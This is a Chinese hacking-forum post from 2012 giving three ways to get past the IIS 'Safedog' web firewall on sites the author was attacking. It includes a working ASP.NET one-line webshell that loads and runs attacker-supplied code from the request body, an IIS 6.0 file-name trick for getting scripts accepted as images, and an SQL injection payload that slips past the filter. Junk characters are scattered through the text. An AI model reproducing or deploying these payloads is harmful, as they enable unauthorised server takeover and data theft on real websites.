1、绕过IIS安全狗的一句话。
+ T" @1 R1 T% F" i前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
1 i; G, B! `" U( n+ Y, k<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
( m! ^, n- v+ e' B- f4 L$ U1 b
9 V5 K( n) F& V0 ]5 d% D. M6 k. W( l8 Y2、IIS6.0解析漏洞遇到安全狗。
$ Y; A, I5 X7 Y0 k6 d文件名为
8 z6 d' m7 D( K8 zhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
' u t: W; ^# @1 ?" L
; T! y7 @; a/ K( Y/ _这样的会被IIS安全狗果断屏蔽。. J" V5 h) K5 g$ {1 G( q
改成如下名称,IIS6一样会解析:
, s+ I, h0 Y0 E2 l% m/ [$ nwww.xxxxx.com/;1.asp;1.jpg
- G9 x) E6 H/ F% e/ V7 X
( I, {8 N5 u8 p! t3、安全狗的注入绕过。
4 _- G7 [9 L7 Y& y3 a- W3 d7 S* _常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。3 t/ S! r' Q4 y! d5 O
但如果:) {1 R& }& [% N6 u& S
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=18 X4 ?7 s% }5 }' V
就可以成功绕过了。2 h: O0 O% _3 i' U4 W, r) e b
6 q) V. `$ I; h: A6 z
% P% s6 s b( t0 ^' N; @ |
发表于 2012-10-31 08:25:30
收藏
支持
反对